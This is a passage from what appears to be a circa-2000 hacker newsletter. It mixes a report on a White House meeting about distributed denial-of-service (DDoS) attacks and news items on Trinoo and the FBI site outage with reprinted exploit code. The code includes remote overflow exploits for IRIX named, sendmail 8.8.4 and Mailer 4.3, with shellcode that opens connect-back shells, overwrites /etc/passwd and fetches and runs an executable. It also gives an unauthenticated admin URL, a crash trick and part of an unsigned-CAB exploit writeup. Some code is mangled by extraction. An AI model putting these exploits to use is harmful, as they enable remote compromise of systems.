his concern, and remind people of the national plan that was recently released. I came away from the meeting with the feeling that a small, positive step had been made. Most importantly, the President had made it clear that information security is an area of national importance and that it is taken seriously by him and his administration. By having Dave Farber and myself there, he had also made a statement to the industry people present that his administration takes the academic community seriously in this area. (Whether many of the industry people got that message -- or care -- remains to be seen.) I recall that there were about 7 major points made that no one disputed: 1) The Internet is international in scope, and most of the companies present have international operations. Thus, we must continue to think globally. US laws and policies won't be enough to address all our problems. 2) Privacy is a big concern for individuals and companies alike. Security concerns should not result in new rules or mechanisms that result in significant losses of privacy. 3) Good administration and security hygiene are critical. The problems of the previous week were caused by many sites (including, allegedly, some government sites) being compromised because they were not maintained and monitored. This, more than any perceived weakness in the Internet, led to the denial of service. 4) There is a great deal of research that yet needs to be done. 5) There are not enough trained personnel to deal with all our security needs. 6) Government needs to set a good example for everyone else, by using good security, employing standard security tools, installing patches, and otherwise practicing good infosec. 7) Rather than new structure or regulation, broadly-based cooperation and information sharing is the near-term approach best suited to solving these kinds of problems. Let's see what happens next. I hope there is good follow-though by some of the parties in attendance, both within and outside government. Miscellany Rich Pethia of CERT, Alan Paller of SANS, and I have drafted a short list of near-term actions that sites can implement to help prevent a recurrence of the DDOS problems. Alan is going to coordinate input from a number of industry people, and then we will publicize this widely. It isn't an agenda for research or long-term change, but we believe it can provide a concrete set of initial steps. This may serve as a good model for future such collaborative activities. I was asked by several people if I was nervous. Actually, no. I've been on national television many times, and I've spoken before crowds of nearly a thousand people. Actually, *he* should have been nervous -- I have tenure, and he clearly does not. :-) The model we have at CERIAS with the partnership of industry and academia is exactly what is needed right now. Our challenge is to find some ways to solve our faculty needs and space shortage. In every other way, we're ideally positioned to continue to make a big difference in the coming years. Of the 29 invited guests, there was only one woman and one member of a traditional minority. I wonder how many of the people in the room didn't even notice? Attendees Douglas F. Busch Vice President of Information Technology, Intel Clarence Chandran President, Service Provider & Carrier Group, Nortel Networks Vinton Cerf Senior Vice President, Internet & Architecture & Engineering, MCI Worldcom Christos Costakos Chief Executive Officer, E-Trade Group, Inc. Jim Dempsey Senior Staff Counsel, Center for Democracy and Technology Whitfield Diffie Corporate Information Officer, Sun Microsystems Nick Donofrio Senior Vice President and Group Executive, Technology & Manufacturing, IBM Dave Farber University of Pennsylvania Elliot Gerson Chief Executive Officer, Lifescape.com Adam Grosser President, Subscriber Networks, Excite@home Stephen Kent BBN Technologies (GTE) David Langstaff Chairman and Chief Executive Officer, Veridan Michael McConnell Booz-Allen Mary Jane McKeever Senior Vice President, World Markets, AT&T Roberto Medrano Senior Vice President, Hewlett Packard Harris N. Miller President, Information Technology Association of America (ITAA) Terry Milholland Chief Information Officer, EDS Tom Noonan Internet Security Systems (ISS) Ray Oglethorpe President, AOL Technologies, America Online Allan Paller Chairman, SANS Institute Rich Pethia CERT/CC, SEI at Carnegie-Mellon University Geoff Ralston Vice President for Engineering, Yahoo! Howard Schmidt Chief Information Security Officer, Microsoft Peter Solvik Chief Information Officer, Cisco Systems Gene Spafford CERIAS at Purdue University David Starr Chief Information Officer, 3Com Charles Wang Chief Executive Officer, Computer Associates International Maynard Webb President, Ebay Peiter Zatko a.k.a. "Mudge" @stake -- COMPASS [for the CDC-6000 series] is the sort of assembler one expects from a corporation whose president codes in octal. -- J.N. Gray ISN is sponsored by Security-Focus.COM @HWA 176.0 ISN:New hacker software could spread by email ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: ISN Mailing list By John Borland Staff Writer, CNET News.com February 23, 2000, 4:35 a.m. PT URL: http://news.cnet.com/category/0-1005-200-1555637.html A group of anonymous programmers has released a new version of the software that may have helped shut down Yahoo and Amazon.com earlier this month--one that makes it far easier to launch attacks, computer experts say. The tools, a new version of a software package dubbed "Trinoo," could allow attackers to infiltrate ordinary desktop computers though an innocent-looking email attachment. These computers--particularly those connected to high-speed Internet services--could then be used as unwitting accomplices in assaults on other Web sites, security analysts say. "(The previous attacks) took someone who knew what they were doing," Trend Micro spokesman David Perry said. "This turns it into a kid-on-the-street problem." The release of these tools follows some of the highest-profile computer attacks in the Web's history. Using a method dubbed "distributed denial of service attacks," computer vandals successfully rendered Yahoo, Amazon, eBay and a handful of other big Web sites paralyzed for hours at a time by swamping them with a multitude of simultaneous requests. The attacks have spurred law enforcement investigations around the globe, but the FBI has not reported any major breakthroughs in the case. Some speculation has centered on several individuals with hacker nicknames like "mafiaboy." Canadian authorities investigated an Internet service provider last week that once hosted a "mafiaboy" hacker-related site. But Canadian police said today that they had no progress to report in their investigation. Although no conclusive evidence has been released on exactly what tools were used in the denial of service attacks, recent speculation has focused on tools with names like Trinoo, Tribe Flood Network and Stacheldracht (German for "barbed wire"). These tools allow an attacker to place agents on "zombie" computers around the world and then wake them up simultaneously to launch a crippling stream of Web traffic at a target site. Security officials at the FBI and other computer security agencies have been warning of the danger these tools pose for several months and have provided software to help guard against their use. But the new version of Trinoo heightens the danger because it makes attacks easier to launch. Because the new version can infiltrate Windows NT-, Windows 95- and Windows 98-based machines, far more computers are at risk of becoming hosts. The Windows version also allows the tools to be spread as apparently innocuous email attachments, much like ordinary viruses. Computer security experts say they haven't seen this happen yet, but that the Windows platform makes it relatively easy to do. "This does make (denial of service attacks) easier," said Elias Levy, chief technical officer for SecurityFocus.com, a computer security Web site. "Not that it required a lot of intelligence or skill before. But this does bring it down another notch." The new tools are largely a threat to users with always-on DSL (digital subscriber line) or cable modem connections, analysts said. This kind of threat has been seen before with the Back Orifice software, Levy noted. That package, once surreptitiously installed on a system, allows an outside person to control the computer remotely. The Trinoo package is geared more specifically for launching denial of service attacks, however. Most of the major antivirus firms have already developed or are developing tools to scan for and remove the new Trinoo software. --------------------------------------------------- "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen. Alfred. M. Gray, USMC --------------------------------------------------- C4I Secure Solutions http://www.c4i.org *=================================================* ISN is sponsored by Security-Focus.COM @HWA 177.0 ISN:FBI Admits site was defaced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: ISN Mailing list http://www.sjmercury.com/svtech/news/breaking/ap/docs/252799l.htm FBI admits its site was attacked BY TED BRIDIS AP Technology Writer WASHINGTON (AP) -- The FBI acknowledged Friday that electronic vandals shut down its own Internet site for hours last week in the same type of attack that disrupted some of the Web's major commercial sites. The bureau's Web site, www.fbi.gov, remained inaccessible for more than three hours Feb. 18 because vandals overwhelmed it by transmitting spurious signals. ``The FBI has made comments they're going to find who's responsible for the latest attacks, so it's a bit of war between the hackers and the bureau,'' said James Williams, a Chicago lawyer and former FBI agent who specialized in investigating computer crimes. The technique, which doesn't require particular sophistication, is similar to repeatedly dialing a phone number to block all other incoming calls. Last year, the FBI pulled down its World Wide Web site for days after hackers overwhelmed it using the same type of attack. No one has claimed responsibility for launching last week's attack against the same law enforcement agency that is investigating serious disruptions earlier this month at Yahoo!, eBay, ETrade, Amazon.Com and others. ``Pretty much anyone is a target,'' agreed John McGowan, a research engineer at ICSA.Net, a computer security firm. He wasn't surprised no one has claimed credit. ``I don't think I'd want to go around bragging that it was my group that shut down the FBI,'' McGowan said. ``They're certainly turning up the carpets and looking for anything they can find.'' The FBI said last week that it couldn't determine whether the problem was a technical fault or malicious attack, but a spokeswoman, Deborah Weierman, confirmed Friday that vandals were responsible. She declined to say whether there was any evidence, other than the coincidence in timing, to link last week's attack against the FBI to those against other Web sites. The FBI noted that its computers weren't broken into, and that its affected Internet site is separate from all its internal systems, including investigative files. ``We have had no more problems since then,'' Weierman said. Engineers at IBM, who run the FBI's Internet site under a federal contract, ``took the appropriate steps to get our Web site back and running (and) continue to look into remedies and actions to minimize this from happening again,'' Weierman said. ISN is sponsored by Security-Focus.COM @HWA 178.0 IRIX 5.3 and 6.2 remote bind iquery overflow by LSD ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 98? not 0-day is it? heh... Source: Packetstorm /* Copyright (c) May 1998 Last Stage of Delirium */ /* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF */ /* Last Stage of Delirium */ /* */ /* The contents of this file may be disclosed to third */ /* parties, copied and duplicated in any form, in whole */ /* or in part, without the prior written consent of LsD. */ /* SGI named remote overflow exploit */ /* tested on IRIX 5.3 and 6.2 including multiprocessor and */ /* multicache machines */ /* won't work on IRIX64 6.2 since its named binary seems to */ /* be not vulnerable to the iquery overflow */ /* usage ./r local_adr local_port target */ /* you must specify the local_adr and local_port since */ /* the remote shell is a connecting shell not a classic */ /* bind shell (it connects with the local machine) */ #include #include #include #include #include #include #include #include #define START_ADR 0x10040100 #define PUTADR(p,adr) {*p=(adr>>24)&0xff;*(p+1)=(adr>>16)&0xff;*(p+2)=(adr>>8)&0xff;*(p+3)=adr&0xff;} #define PUTADRH(p,adr) {*p=(adr>>24)&0xff;*(p+1)=(adr>>16)&0xff;} #define PUTADRL(p,adr) {*p=(adr>>8)&0xff;*(p+1)=adr&0xff;} char tablica[25]={ 0x00,0x00,0x34,0x34,0x09,0x80,0x00,0x00, 0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00, 0x01,0x00,0x01,0x20,0x20,0x20,0x20,0x00,0x00}; char asmcode[]={ 0x24,0x04,0x00,0x02,0x24,0x05,0x00,0x02,0x24,0x06,0x00,0x00,0x24,0x02,0x04,0x53, 0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x00,0x40,0x80,0x25,0x00,0x40,0x20,0x25, 0x3c,0x05,0x10,0x04,0x34,0xa5,0xff,0xff,0x24,0x06,0x00,0x10,0x24,0x02,0x04,0x43,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x24,0x02,0x03,0xee,0x24,0x04,0x00,0x00,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x24,0x02,0x03,0xee,0x24,0x04,0x00,0x01,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x24,0x02,0x03,0xee,0x24,0x04,0x00,0x02,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x02,0x00,0x20,0x25,0x24,0x02,0x04,0x11,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x02,0x00,0x20,0x25,0x24,0x02,0x04,0x11,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x02,0x00,0x20,0x25,0x24,0x02,0x04,0x11,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x3c,0x04,0x10,0x01,0x34,0x84,0xff,0xf1,0x3c,0x05,0x10,0x02,0x34,0xa5,0xff,0xf2,0x24,0x02,0x03,0xf3,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x00, '/','b','i','n','/','s','h',0, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; main(int argc,char **argv){ int sck,i,srvsck; fd_set readfs; struct sockaddr_in address; struct sockaddr_in local; struct hostent *hp; int size; unsigned long lregt9,lreggp,lstart,lbcop7,ltmp; char regt9[4],reggp[4],start[4],bcop7[4]; char *b,*p; printf("IRIX named remote exploit\n"); printf("Last Stage of Delirium, May 1998, Poland\n\n"); if(argc!=4){ printf("usage: %s local_adr local_port target\n",argv[0]);exit(1); } srvsck=socket(AF_INET,SOCK_STREAM,0); bzero(&local,sizeof(local)); local.sin_family=AF_INET; local.sin_port=htons(atoi(argv[2])); if((local.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if((hp=gethostbyname(argv[1]))==NULL){ printf("error: address.\n");exit(-1); } memcpy(&local.sin_addr.s_addr,hp->h_addr,4); } if (bind(srvsck,(struct sockaddr *)&local,sizeof(local))<0) { perror("error");exit(-1); } lbcop7=lregt9=START_ADR; lstart=START_ADR+0x14; lreggp=START_ADR+0x8024; PUTADR(regt9,lregt9); PUTADR(reggp,lreggp); PUTADR(start,lstart); PUTADR(bcop7,lbcop7); ltmp=START_ADR+0xd8; PUTADRH(&asmcode[0x34-20+2],ltmp); PUTADRL(&asmcode[0x38-20+2],ltmp); ltmp=START_ADR+0xc8; PUTADRH(&asmcode[0xa8-20+2+4],ltmp); PUTADRL(&asmcode[0xac-20+2+4],ltmp); PUTADR(&asmcode[0xcc-20+4],ltmp); ltmp=START_ADR+0xd0; PUTADRH(&asmcode[0xb0-20+2+4],ltmp); PUTADRL(&asmcode[0xb4-20+2+4],ltmp); ltmp=local.sin_addr.s_addr; PUTADR(&asmcode[0xdc-20],ltmp); ltmp=local.sin_port; PUTADRL(&asmcode[0xda-20],ltmp); size=930; tablica[0]=(size+23)>>8; tablica[1]=(size+23)&0xff; tablica[23]=size>>8; tablica[24]=size&0xff; if((b=(char*)malloc(10500))==NULL) return(-1); memset(b,0,10500); bcopy(tablica,b,sizeof(tablica)); for(i=0;ih_addr,4); } if(connect(sck,(struct sockaddr *)&address,sizeof(address))<0){ perror("error");exit(-1); } fflush(stdout); write(sck,b,25+size); close(sck); size=10000; b[0]=(size+23)>>8; b[1]=(size+23)&0xff; b[23]=size>>8; b[24]=size&0xff; sck=socket(AF_INET,SOCK_STREAM,0); sleep(1); if(connect(sck,(struct sockaddr *)&address,sizeof(address))<0){ perror("error");exit(-1); } fflush(stdout); write(sck,b,25+size); close(sck); listen(srvsck,5); srvsck=accept(srvsck,(struct sockaddr*)&local,&i); printf("%s successfully exploited\n",argv[3]); fflush(stdout); while(1){ FD_ZERO(&readfs); FD_SET(0,&readfs); FD_SET(srvsck,&readfs); if(select(FD_SETSIZE,&readfs,NULL,NULL,NULL)){ int cnt; char buf[1024]; if(FD_ISSET(0,&readfs)){ if((cnt=read(0,buf,1024))<1){ if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else {printf("koniec.\n");exit(-1);} } write(srvsck,buf,cnt); } if(FD_ISSET(srvsck,&readfs)){ if((cnt=read(srvsck,buf,1024))<1){ if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else {printf("koniec.\n");exit(-1);} } write(1,buf,cnt); } } } free(b); close(srvsck); } /* www.hack.co.za */ @HWA 179.0 FreeBSD Sendmail 8.8.4 mime 7to8 remote exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: Packetstorm More old stuff? anyone still use 8.8.* ?? /* sendmail 8.8.4, freebsd, mime 7to8, remote I checked this only at home, at custom installed 8.8.4. I have no freebsd with preinstaled 8.8.4 around. change cmd[] below to shell command you want, and throw output to sendmail */ #include #include #define BUFSIZE 6100 #define OFFS -5000 #define ALIGN 0 #define ADDRS 15 int get_sp(void) { /* __asm__(" movl %esp,%eax"); */ return 0xefbf95e4; } /* up to 220 bytes */ char cmd[]="echo 'h::0:0:/tmp:/bin/bash > /etc/passwd'"; char asmcode[]="\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89" "\x36\x89\x76\x04\x89\x76\x08\x83\x06\x10\x83\x46" "\x04\x18\x83\x46\x08\x1b\x89\x46\x0c\x88\x46\x17" "\x88\x46\x1a\x88\x46\x1d\x50\x56\xff\x36\xb0\x3b" "\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff" "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02" "\x02\x02\x02\x02\x02\x02\x2f\x62\x69\x6e\x2f\x73" "\x68\x2e\x2d\x63\x2e"; char nop[]="\x90"; char Base64Table[]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; void run(unsigned char *buf) { unsigned int i, j, k; printf("MIME-Version: 1.0\n"); printf("Content-Type: text/plain\n"); printf("Content-Transfer-Encoding: base64\n"); k=strlen(buf) / 3 * 3; for (i=0; i < k; i+=3) { j=(buf[i] << 16) + (buf[i+1] << 8) + buf[i+2]; if (i % 54 == 0) printf("\n"); printf("%c", Base64Table[(j & 0xfc0000) >> 18]); printf("%c", Base64Table[(j & 0x03f000) >> 12]); printf("%c", Base64Table[(j & 0x000fc0) >> 6]); printf("%c", Base64Table[j & 0x00003f]); } switch (strlen(buf) - k) { case 1: printf("%c%c==", Base64Table[(buf[k] & 0xfc) >> 2], Base64Table[(buf[k] & 0x3) << 4]); break; case 2: printf("%c%c%c=", Base64Table[(buf[k] & 0xfc) >> 2], Base64Table[((buf[k] & 0x3) << 4)+((buf[k+1] & 0xf0) >> 4)], Base64Table[(buf[k+1] & 0xf) << 2]); break; default: } printf("\n"); } char code[sizeof(asmcode) + sizeof(cmd)]; main(int argc, char *argv[]) { char *buf, *ptr, addr[8]; int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS; int i, noplen=strlen(nop); if (argc >1) bufsize=atoi(argv[1]); if (argc >2) offs=atoi(argv[2]); if (argc >3) addrs=atoi(argv[3]); strcpy(code, asmcode); strncat(code, cmd); strncat(code, "."); code[41]=0x1a+strlen(cmd)+1; if (bufsize===] Written by Nemesystm, leader of the DHC [===<+++ ++++>==] Visit us at dhc1.cjb.net You want 2 [==<++++ Subject: Infradig 1.225 Security Hole Description program: Infradig is a HTTP Server with a Mail daemon, etc. Description hole: There are no restrictions on the online administration bit of the server software. <-[what was used]-> Infradig 1.225 for Windows 95/98 downloaded from cnet.com Installed with the typical installation, no standard settings changed. This problem worked on: Windows 98 + IE5.0 <-[how to create the problem]-> The administration service runs on port 81 (as adefault, can be set). Connecting to: http://www.server.com:81/sysadmin/sysadmin.cgi will let you edit accounts, add users, set all kinds of things like ports, and start services. (FTP, etc) On the HTTP server, you can go to http://www.server.com/sysadmin/ and it will/should automatically refer you to the administration service. <-[logs]-> when you go to the administration page, your IP is logged. you can find the logs in programdir\logs. It also has what you do, and what browser you used. <-[fix]-> Delete: program dir\inetpub\sysadmin\*.* program dir\inetpub\mailadmin\*.* Change all user things, etc, by rightclicking the server icon in the bottom right corner of the screen and choosing "Manual configure" Greetz, nemesystm, leader of the DHC (dhc1.cjb.net) >>>The End<<< auto45040@hushmail.com for questions. @HWA 181.0 Remote exploit for Mailer 4.3 - Win 9x/NT. By Cybz ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: Packetstorm /* Remote exploit for Mailer 4.3 - Win 9x/NT (PRIVATE DO NOT DISTRIBUTE) Author: Cybz (8. dec '99) Try offsets +600 to +800 */ #include #include #include #include #include #include #include #include #define BUF_SIZE 3412 #define PORT 110 #define OFFSET 674 char shellcode[701] = { 0xEB,0x58,0x5F,0x32,0xC0,0x8B,0xDF,0x33,0xC9,0xB1,0x09,0xFE,0xC1,0x03,0xD9,0x88, 0x03,0x88,0x47,0x16,0x88,0x47,0x21,0x88,0x47,0x28,0x88,0x47,0x30,0x88,0x47,0x35, 0x88,0x47,0x41,0x88,0x47,0x47,0x88,0x47,0x4E,0x88,0x47,0x55,0x88,0x47,0x58,0x88, 0x47,0x5E,0x88,0x47,0x65,0x88,0x47,0x6A,0x8B,0xC7,0x50,0xB8,0x50,0x77,0xF7,0xBF, 0xFF,0xD0,0x89,0x47,0x6E,0x8B,0xC7,0x33,0xC9,0xB1,0x0B,0x03,0xC1,0x50,0xB8,0x50, 0x77,0xF7,0xBF,0xFF,0xD0,0x89,0x47,0x72,0xEB,0x02,0xEB,0x72,0x8B,0xC7,0x33,0xC9, 0xB1,0x17,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B, 0xF0,0x8B,0xC7,0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0x33,0xC0,0xB0,0x02,0x50,0xFF, 0xD6,0x57,0x33,0xC9,0xB1,0x82,0x03,0xF9,0x33,0xC9,0x66,0xB9,0x90,0x01,0x33,0xC0, 0xF3,0xAA,0x5F,0x8B,0xC7,0x33,0xC9,0xB1,0x22,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8, 0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0x50,0x40,0x50,0x40,0x50,0xFF, 0xD6,0x89,0x47,0x76,0x8B,0xDF,0x33,0xC9,0xB1,0x82,0x03,0xD9,0xC6,0x03,0x02,0x66, 0xC7,0x43,0x02,0x1B,0x58,0xC7,0x43,0x04,0xEE,0xEE,0xEE,0xEE,0xEB,0x02,0xEB,0x56, 0x8B,0xC7,0x33,0xC9,0xB1,0x29,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7, 0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0xB0,0x10,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x82, 0x03,0xC1,0x50,0xFF,0x77,0x76,0xFF,0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x42,0x03,0xC1, 0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x8B,0xC7,0x33, 0xC9,0xB1,0x56,0x03,0xC1,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x59,0x03,0xC1,0x50,0xFF, 0xD6,0x89,0x47,0x7A,0xEB,0x02,0xEB,0x63,0x8B,0xC7,0x33,0xC9,0xB1,0x31,0x03,0xC1, 0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0x50, 0x66,0xB8,0xE8,0x03,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0xFF,0x77, 0x76,0xFF,0xD6,0x89,0x47,0x7E,0x33,0xDB,0x3B,0xC3,0x74,0x31,0x72,0x2F,0x8B,0xC7, 0x33,0xC9,0xB1,0x48,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF, 0xD0,0x8B,0xF0,0xFF,0x77,0x7A,0xFF,0x77,0x7E,0x33,0xC0,0xB0,0x01,0x50,0x8B,0xC7, 0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0xFF,0xD6,0xEB,0x9D,0xEB,0x6C,0x8B,0xC7,0x33, 0xC9,0xB1,0x36,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0, 0x8B,0xF0,0xFF,0x77,0x76,0xFF,0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x4F,0x03,0xC1,0x50, 0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0xFF,0x77,0x7A,0xFF, 0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x5F,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E, 0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x8B,0xC7,0x33,0xC9,0xB1,0x59,0x03,0xC1,0x50,0xFF, 0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x66,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E, 0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0x53,0xFF,0xD0,0x90,0xE8,0x03,0xFE,0xFF,0xFF,0x6D, 0x73,0x76,0x63,0x72,0x74,0x2E,0x64,0x6C,0x6C,0x2C,0x77,0x73,0x6F,0x63,0x6B,0x33, 0x32,0x2E,0x64,0x6C,0x6C,0x2C,0x57,0x53,0x41,0x53,0x74,0x61,0x72,0x74,0x75,0x70, 0x2C,0x73,0x6F,0x63,0x6B,0x65,0x74,0x2C,0x63,0x6F,0x6E,0x6E,0x65,0x63,0x74,0x2C, 0x72,0x65,0x63,0x76,0x2C,0x63,0x6C,0x6F,0x73,0x65,0x73,0x6F,0x63,0x6B,0x65,0x74, 0x2C,0x66,0x6F,0x70,0x65,0x6E,0x2C,0x66,0x77,0x72,0x69,0x74,0x65,0x2C,0x66,0x63, 0x6C,0x6F,0x73,0x65,0x2C,0x77,0x62,0x2C,0x78,0x2E,0x65,0x78,0x65,0x2C,0x73,0x79, 0x73,0x74,0x65,0x6D,0x2C,0x65,0x78,0x69,0x74,0x2C,0x2C,0x2C,0x2C,0x00 }; int main(int argc,char *argv[]) { char buf[BUF_SIZE]; struct hostent *info; struct sockaddr_in server; int fd,i; unsigned int ip,port,yourip; if (argc < 3) { printf("usage: %s \n", argv[0]); exit(1); } if ((yourip=inet_addr(argv[2]))==-1){ if ((info=gethostbyname(argv[2]))==NULL){ printf("Unable to resolve local hostname.\n"); exit(1); } memcpy((caddr_t)&yourip,info->h_addr,info->h_length); } bzero(&server, sizeof(server)); server.sin_family = AF_INET; server.sin_port = htons(PORT); if ((server.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((info=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified VictimHost.\n"); exit(1); } server.sin_family = info->h_addrtype; memcpy((caddr_t)&server.sin_addr.s_addr,info->h_addr,info->h_length); } if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(fd, (struct sockaddr *)&server, sizeof(server)) < 0){ perror("connect"); exit(0); } while((i=read(fd,buf,sizeof(buf))) > 0){ buf[i]=0; if(strchr(buf,'\n')!=NULL) break; } memset(buf,0x90,BUF_SIZE); for (i=267;i<271;i++) buf[i]=0x30; ip=htonl(yourip); memcpy(buf+OFFSET+4,shellcode,strlen(shellcode)); buf[BUF_SIZE]=0; sprintf(buf,"RCPT TO: %s\r\n",buf); write(fd,buf,strlen(buf)); close(fd); } /* www.hack.co.za */ @HWA 182.0 Variation of the win98 con exploit that crashes netscape as well. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Other variations exist to crash other Win9* Win2* programs, see elsewhere in this issue. - Ed Source: Packetstorm The Windows 98 "Con" exploit Although reading various advisories and documents concerning the /con/con exploit, no one has posted it has a hyperlink yet. Some authors did post it like this : But an author has mentioned that Netscape was not affected (with the example mentioned above), that's very true "if" applied using the method mentioned above. But i've tested on my own IE 5.0 and it didn't seem to affect either. So i've tried putting it like this in an html file: Click here to test it. NOTE: THIS MIGHT CAUSE YOUR COMPUTER TO LOCK UP/CRASH, TRY AT OWN RISK. And that have seemed to affect IE AND Netscape browsers running on Win98 OS. Haven't tested with other browsers yet, so any feedback would be appreciated. Neon-Lenz� neonlenz@hackermail.net @HWA 183.0 Microsoft unsigned .CAB exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: Packetstorm Vulnerability details and example exploit for Microsoft Active Setup control's unsigned CAB file execution vulnerability. Introduction Microsoft's Active Setup Control (asctrls.ocx) shipped with Internet Explorer 4 and above has a vulnerability in it as discovered by Juan Carlos Garcia Cuartango , which was posted on BUGTRAQ (ID 775) in the month of November, 1999. Microsoft has released patches for its control which may be procured from its website. This document aims to provide the actual details of the vulnerability as well as an example exploit. NOTE: This is NOT a document on the Microsoft signed software backdoor vulnerability as posted on BUGTRAQ (ID 999) in February 2000. Disclaimer The material in this document is released AS IS for EDUCATIONAL PURPOSES ONLY. This document may be used by security analysers to monitor how probable crackers may intrude into their systems. The author of this document does not wish to give his opinion on supporting or critisizing vulnerability analysis. You are advised against using any of the material in this document for criminal purposes. All responsiblity of action, pros, cons, the cause and effect of your action, is on you. You are responsible for EVERYTHING. The author is in no way responsible for any sort of action which is caused by the material in this document. YOU ARE ON YOUR OWN. Vulnerability Details On November 8th 1999, a public announcement was made that a severe vulnerability existed in Microsoft's Active Setup control which was shipped with Internet Explorer 4 and above. The vulnerability was so severe that almost any kind of break-in was possible into client machines. Email bombs, viruses, criminal acts such as gathering of secret documents, etc. are all very possible with such a security hole. Microsoft was quick to release a security bulletin and make patches available on its website. Nobody apart from Microsoft and Juan Carlos Garcia Cuartango knew how to exploit the vulnerability and the whole world was a safer place. Not many knew how to use the Active Setup control as not much information was released to the public about the control. Now that its been quite a while since patches have been made available, I have decided to release an example exploit to implicitly explain what kind of security measures have to be deployed. The Active Setup control has a vulnerability which allows the installation of software from unsigned local CAB files. By local files, I mean CAB files on the client machine (as opposed to on the Internet). No checking is done and the contents of the cabinet file are trusted. This is the vulnerability. For details on the Active Setup process and using the component, please refer to the links provided at the end of this document. In short words, the Active Setup control is a software component (which may be used in other programs/scripts) to install software. The Active Setup control is used through function calls in the program/script code. An input CAB file contains a list of installation files (including executable files) and a cabinet information file (CIF) which describes what is to be done with the CAB file. Exploit Details PLEASE READ THE DOCUMENTATION ON THE ACTIVE SETUP CONTROL (given in links below). We now examine how this bug may be exploited. Supposing we are able to store an unsigned CAB on the client machine, it becomes local to the client. Hence, we may process the unsigned CAB file using the Active Setup control successfully. We may use an HTML file with VBScript in it to run the control. VBScript has support for ActiveX controls (Active Setup is an ActiveX control). The VBScript is invoked when the HTML file loads. The VBScript then initializes the control with details of where the CAB file is present on the client machine, and asks the control to process the CAB file. The Active Setup control then processes the CAB file, and executes EXE programs archived in the CAB file with NO SECURITY LIMITATIONS. The EXE program may then do anything it wishes to do. Now, obviously, there are questions in your head. How do I transfer a CAB file onto the client's machine? The answer is simple. The client user is not mad to download an unsigned CAB file. So you may disguise it as a file of another format (in short words, rename the file's extension). Now, what types of files are implicitly downloaded? HTML, GIF, JPG, etc. which make up a page are downloaded when the user visits a site using Internet Explorer. But these files are stored in temporary directories. Although a CAB file disguised as a JPG file will download onto the local client, where will it be stored? The location is not fixed. When the location can be determined, we may be able to write an exploit for Internet Explorer. But until then, there are other options. Hey, what about Outlook Express? Too many people have told me. "DON'T USE OUTLOOK EXPRESS! It's too intelligent." They are right I guess. Outlook Express uses components of Internet Explorer to handle HTML files. So You can display HTML messages in Outlook express. More important, YOU CAN RUN VBSCRIPTS in Outlook Express. How is it going to help? SIMPLE. I attach a file called 